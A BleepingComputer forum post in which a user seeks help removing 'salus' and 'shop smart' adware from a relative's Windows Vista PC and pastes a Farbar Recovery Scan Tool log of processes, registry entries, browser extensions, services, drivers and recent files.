Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Infected with salus and shop smart


  • This topic is locked This topic is locked
10 replies to this topic

#1 SereneSnake

SereneSnake

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:04:30 AM

Posted 12 April 2015 - 09:28 PM

I am attempting to clean up my sister's PC. She has two teenagers and they play flash games so finding her PC infected isn't exactly a surprise to me. I have cleaned most of the offending programs however two are proving most troublesome: salus and shop smart, None of the reputable programs can even see these programs, much less remove them. Internet browsing is a nightmare as salus creates pop ups on every page and clicking to close opens new tabs/windows. Shop smart takes up space and is generally annoying and redirects as well. The only reason I haven't done a re install is because this PC uses Vista and doesn't have a disc. Any help would be GREATLY appreciated.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 12-04-2015
Ran by Angel (administrator) on ANGEL-PC on 12-04-2015 20:57:04
Running from C:\Users\Angel\Downloads
Loaded Profiles: Angel (Available profiles: Angel)
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Andrea Electronics Corporation) C:\Windows\System32\AERTSrv.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Teruten) C:\Windows\System32\FsUsbExService.Exe
(Reimage®) C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe
(Reimage®) C:\Program Files\Reimage\Reimage Protector\ReiSystem.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Intel Corporation) C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(Intel Corporation) C:\Program Files\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(CyberLink Corp.) C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(SEIKO EPSON CORPORATION) C:\Program Files\epson\Creativity Suite\Event Manager\EEventManager.exe
(Hewlett-Packard Company) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
(Hewlett-Packard) C:\Windows\System32\hphmon06.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe
() C:\Program Files\Smgy0ntk1mjjizdb\mgi0nzk4mjziyjb.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Macrovision Corporation) C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe
(Microsoft Corporation) C:\Program Files\Windows Live\Messenger\msnmsgr.exe
(Samsung Electronics Co., Ltd.) C:\Program Files\SAMSUNG\Samsung New PC Studio\NPSAgent.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Hewlett-Packard Co.) C:\Program Files\HP\digital imaging\bin\hpqgalry.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-20] (Microsoft Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [6265376 2008-08-19] (Realtek Semiconductor)
HKLM\...\Run: [IAAnotif] => C:\Program Files\Intel\Intel Matrix Storage Manager\iaanotif.exe [182808 2008-07-20] (Intel Corporation)
HKLM\...\Run: [PDVDDXSrv] => C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe [128296 2008-05-23] (CyberLink Corp.)
HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM\...\Run: [EEventManager] => C:\Program Files\EPSON\Creativity Suite\Event Manager\EEventManager.exe [102400 2005-04-08] (SEIKO EPSON CORPORATION)
HKLM\...\Run: [HPHUPD06] => C:\Program Files\HP\{AAC4FC36-8F89-4587-8DD3-EBC57C83374D}\hphupd06.exe [49152 2004-06-06] (Hewlett-Packard)
HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [49152 2004-02-12] (Hewlett-Packard Company)
HKLM\...\Run: [HP Component Manager] => C:\Program Files\HP\hpcoretech\hpcmpmgr.exe [241664 2004-05-12] (Hewlett-Packard Company)
HKLM\...\Run: [HPHmon06] => C:\Windows\system32\hphmon06.exe [659456 2004-06-06] (Hewlett-Packard)
HKLM\...\Run: [NPSStartup] => [X]
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2015-01-20] (Apple Inc.)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [978520 2015-01-30] (Microsoft Corporation)
HKLM\...\Run: [SDTray] => C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
HKLM\...\Run: [mgy0ntk1mjjizdb] => C:\Program Files\Smgy0ntk1mjjizdb\mgi0nzk4mjziyjb.exe [2391040 2015-02-15] ()
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-07-08] (Apple Inc.)
Winlogon\Notify\SDWinLogon: SDWinLogon.dll [X]
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [ISUSPM] => C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe [218032 2006-09-11] (Macrovision Corporation)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [msnmsgr] => C:\Program Files\Windows Live\Messenger\msnmsgr.exe [3882312 2008-12-02] (Microsoft Corporation)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [AutoStartNPSAgent] => C:\Program Files\SAMSUNG\Samsung New PC Studio\NPSAgent.exe [95576 2010-07-04] (Samsung Electronics Co., Ltd.)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [Spybot-S&D Cleaning] => C:\Program Files\Spybot - Search & Destroy 2\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [5529880 2015-03-13] (Piriform Ltd)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\WLXPGSS.SCR [307560 2008-12-04] (Microsoft Corporation)
AppInit_DLLs: C:\PROGRA~1\SearchProtect\SearchProtect\bin\SPVC32Loader.dll => C:\PROGRA~1\SearchProtect\SearchProtect\bin\SPVC32Loader.dll File Not Found
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\digital imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Image Zone Fast Start.lnk
ShortcutTarget: HP Image Zone Fast Start.lnk -> C:\Program Files\HP\digital imaging\bin\hpqthb08.exe (Hewlett-Packard Co.)
Startup: C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
ProxyServer: [S-1-5-21-1464855766-1936325176-3098395914-1000] => http=127.0.0.1:49172;https=127.0.0.1:49172
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
SearchScopes: HKLM -> DefaultScope {006ee092-9658-4fd6-bd8e-a21a348e59f5} URL = 
SearchScopes: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000 -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = 
BHO: No Name -> {1FD79A59-37B1-459B-9097-09F9FAB8A523} ->  No File
BHO: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} ->  No File
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\ssv.dll [2012-05-04] (Oracle Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\jp2ssv.dll [2012-05-04] (Oracle Corporation)
Toolbar: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2009-02-26] (Microsoft Corporation)
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation)
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation)
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
 
FireFox:
========
FF ProfilePath: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-04] ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2014-02-21] ()
FF Plugin: @java.com/DTPlugin,version=10.5.1 -> C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\dtplugin\npDeployJava1.dll [2012-05-04] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=14.0.8051.1204 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2008-12-04] (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-30] (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-10] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-10] (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2014-12-03] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1464855766-1936325176-3098395914-1000: @soe.sony.com/installer,version=1.0.3 -> C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\{38AB6A6C-CC4C-4f9e-A3DD-3C5681EF18A1}\plugins\npsoe.dll No File
FF Plugin HKU\S-1-5-21-1464855766-1936325176-3098395914-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Angel\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-10-17] (Unity Technologies ApS)
FF user.js: detected! => C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\user.js [2014-12-24]
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\np-mswmp.dll [2007-04-10] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npCouponPrinter.dll [2008-06-18] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFF12.DLL [2006-10-26] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2014-05-08] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPTURNMED.dll [2009-03-11] (CNN)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\np_gp.dll [2009-09-23] (NOS Microsystems Ltd.)
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\allrecipes.xml [2009-01-16]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\facebook.xml [2012-11-26]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\imdb.xml [2008-11-05]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\punditkitchennetwork.xml [2009-04-08]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\searchcanvas.xml [2014-08-09]
FF Extension: No Name - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\aoiuyau@vbgdka.edu [2014-07-29]
FF Extension: FoxSaver - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\foxsaver@www.foxsaver.com [2011-08-29]
FF Extension: Move Media Player - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\moveplayer@movenetworks.com [2009-02-17]
FF Extension: Tab To Window - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\tabtowindow@sogame.cat [2009-06-15]
FF Extension: No Name - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\yeeyiye@bffm.org [2014-08-09]
FF Extension: Microsoft .NET Framework Assistant - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b} [2010-05-01]
FF Extension: IE Tab - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{77b819fa-95ad-4f2c-ac7c-486b356188a9} [2013-06-07]
FF Extension: No Name - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822} [2014-07-13]
FF Extension: Personas Plus - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\personas@christopher.beard.xpi [2013-03-03]
FF Extension: Halloween - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{BB359C50-BFC9-4f40-8302-3FE5A499A859}.xpi [2012-05-07]
FF Extension: Adblock Plus - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2012-05-07]
FF Extension: Red Cats (green flavor) - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{dd30bf68-268a-4815-ad48-8740b774c764}.xpi [2012-05-07]
FF Extension: Red Cats (blue flavor) - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{ff356687-aa08-463d-a46c-11c451824939}.xpi [2012-05-07]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-02-16]
StartMenuInternet: FIREFOX.EXE - firefox.exe
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-07-02]
CHR Extension: (YouTube) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2011-12-16]
CHR Extension: (Adblock Plus) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2015-04-02]
CHR Extension: (Google Search) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2011-12-16]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-16]
CHR Extension: (Google Wallet) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-16]
CHR Extension: (Gmail) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2011-12-16]
CHR HKLM\...\Chrome\Extension: [jmfkcklnlgedgbglfkkgedjfmejoahla] - C:\Program Files\AVG\AVG2012\Chrome\safesearch.crx [Not Found]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AERTFilters; C:\Windows\system32\AERTSrv.exe [81920 2008-08-19] (Andrea Electronics Corporation)
S3 getPlusHelper; C:\Program Files\NOS\bin\getPlus_Helper.dll [51168 2009-09-23] (NOS Microsystems Ltd.)
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed]
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22184 2015-01-30] (Microsoft Corporation)
S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [284472 2015-01-30] (Microsoft Corporation)
S3 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.exe [65536 2004-03-18] (HP) [File not signed]
R2 ReimageRealTimeProtector; C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [6079848 2015-01-14] (Reimage®)
R2 SDScannerService; C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
S3 stllssvr; C:\Program Files\Common Files\SureThing Shared\stllssvr.exe [69632 2007-07-11] (MicroVision Development, Inc.) [File not signed]
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [272952 2008-01-20] (Microsoft Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 FsUsbExDisk; C:\Windows\system32\FsUsbExDisk.SYS [36608 2010-06-14] () [File not signed]
S4 JRAID; C:\Windows\system32\drivers\jraid.sys [79960 2008-08-19] (JMicron Technology Corp.)
R3 KMWDFILTER; C:\Windows\System32\DRIVERS\KMWDFILTER.sys [17408 2008-10-09] (Windows ® Codename Longhorn DDK provider)
R1 mgi0nzk4mjziyjb; C:\Windows\System32\drivers\mgi0nzk4mjziyjb.sys [56200 2015-02-15] (NetFilterSDK.com)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [239224 2014-11-15] (Microsoft Corporation)
R1 netfilter; C:\Windows\System32\drivers\netfilter.sys [51792 2014-11-19] (NetFilterSDK.com)
R3 pfc; C:\Windows\System32\drivers\pfc.sys [21248 2003-09-19] (Padus, Inc.) [File not signed]
S3 rt70x86; C:\Windows\System32\DRIVERS\netr70.sys [306016 2010-04-27] (Ralink Technology Corp.)
R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-08-19] (Windows ® Codename Longhorn DDK provider)
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [13464 2014-07-02] ()
S3 cpuz134; \??\C:\Users\Angel\AppData\Local\Temp\cpuz134\cpuz134_x32.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-04-12 20:57 - 2015-04-12 20:59 - 00021768 _____ () C:\Users\Angel\Downloads\FRST.txt
2015-04-12 20:56 - 2015-04-12 20:56 - 00000000 ____D () C:\Users\Angel\Downloads\FRST-OlderVersion
2015-04-12 20:26 - 2015-04-12 20:54 - 00003364 _____ () C:\Windows\PFRO.log
2015-04-11 23:11 - 2015-04-11 23:11 - 00001891 _____ () C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
2015-04-11 23:11 - 2015-04-11 23:11 - 00000000 ____D () C:\ProgramData\Reimage Protector
2015-04-11 23:11 - 2015-04-11 23:11 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair
2015-04-11 23:10 - 2015-04-11 23:12 - 00000000 ____D () C:\rei
2015-04-11 23:10 - 2015-04-11 23:11 - 00000000 ____D () C:\Program Files\Reimage
2015-04-11 23:09 - 2015-04-11 23:12 - 00000158 _____ () C:\Windows\Reimage.ini
2015-04-11 23:09 - 2015-04-11 23:09 - 00768512 _____ (Reimage®) C:\Users\Angel\Documents\ReimageRepair.exe
2015-04-11 22:51 - 2015-04-11 22:51 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2015-04-11 22:51 - 2015-04-11 22:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2015-04-11 22:50 - 2015-04-11 22:50 - 00000000 ____D () C:\Program Files\iPod
2015-04-11 22:49 - 2015-04-11 22:49 - 00000000 ____D () C:\Program Files\Bonjour
2015-04-04 22:22 - 2015-04-04 22:22 - 00000000 ____D () C:\ProgramData\WindowsSearch
2015-04-03 18:19 - 2015-04-12 20:53 - 00272159 _____ () C:\Windows\WindowsUpdate.log
2015-04-03 17:31 - 2015-04-03 17:31 - 00000000 ____D () C:\Windows\pss
2015-04-03 17:17 - 2015-04-12 20:57 - 00000000 ____D () C:\FRST
2015-04-03 17:17 - 2015-04-12 20:56 - 01135616 _____ (Farbar) C:\Users\Angel\Downloads\FRST.exe
2015-04-02 21:41 - 2015-04-02 21:42 - 00010074 _____ () C:\Users\Angel\Downloads\hijackthis.log
2015-04-02 21:40 - 2015-04-02 21:40 - 00388608 _____ (Trend Micro Inc.) C:\Users\Angel\Downloads\HijackThis.exe
2015-04-02 21:32 - 2015-04-02 21:32 - 00000806 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2015-04-02 21:31 - 2015-04-02 21:32 - 00000000 ____D () C:\Program Files\CCleaner
2015-04-02 21:20 - 2015-04-02 21:20 - 05346704 _____ (Piriform Ltd) C:\Users\Angel\Downloads\ccsetup504pro.exe
2015-04-02 19:51 - 2015-01-28 20:35 - 00369664 _____ (Microsoft Corporation) C:\Windows\system32\WMPhoto.dll
2015-04-02 19:50 - 2015-01-28 20:35 - 00975360 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2015-04-02 19:48 - 2015-02-25 19:18 - 02064384 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-04-02 19:40 - 2015-02-19 21:03 - 00034304 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2015-04-02 19:40 - 2015-02-19 19:28 - 00296960 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2015-04-02 19:39 - 2015-02-25 21:01 - 03604408 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2015-04-02 19:39 - 2015-02-25 21:01 - 03552184 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-04-02 19:39 - 2015-01-08 21:04 - 00049152 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2015-04-02 19:39 - 2015-01-08 19:18 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2015-04-02 19:38 - 2015-03-05 23:01 - 00279040 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2015-04-02 19:38 - 2015-01-20 21:02 - 00807936 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2015-04-02 19:37 - 2015-02-17 21:02 - 11587584 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2015-04-02 18:54 - 2015-02-21 12:37 - 12375040 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-04-02 18:54 - 2015-02-21 12:34 - 00367104 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2015-04-02 18:54 - 2015-02-21 12:29 - 09747968 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-04-02 18:54 - 2015-02-21 12:28 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-04-02 18:54 - 2015-02-21 12:22 - 01139200 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-04-02 18:54 - 2015-02-21 12:21 - 01427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-04-02 18:54 - 2015-02-21 12:21 - 01129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-04-02 18:54 - 2015-02-21 12:20 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
